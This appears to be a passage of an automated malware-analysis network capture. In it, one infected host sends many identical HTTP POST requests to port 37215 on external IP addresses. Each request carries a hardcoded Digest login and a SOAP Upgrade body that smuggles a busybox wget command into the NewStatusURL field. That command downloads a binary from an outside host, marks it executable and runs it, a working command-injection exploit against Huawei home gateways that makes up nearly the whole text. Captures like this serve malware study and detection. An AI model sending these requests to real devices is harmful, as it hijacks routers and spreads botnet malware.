                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1142192.168.2.154229441.139.179.24637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174518108 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1143192.168.2.153541041.109.65.21837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174535990 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1144192.168.2.155026641.71.198.3737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174567938 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1145192.168.2.154596641.230.116.1337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174596071 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1146192.168.2.155234041.98.92.18237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174631119 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1147192.168.2.153572041.199.200.17537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174658060 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1148192.168.2.155740041.81.208.19737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174694061 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1149192.168.2.155103041.204.87.2937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174763918 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1150192.168.2.153728641.20.19.2137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174787045 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1151192.168.2.153404841.12.149.15037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174788952 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
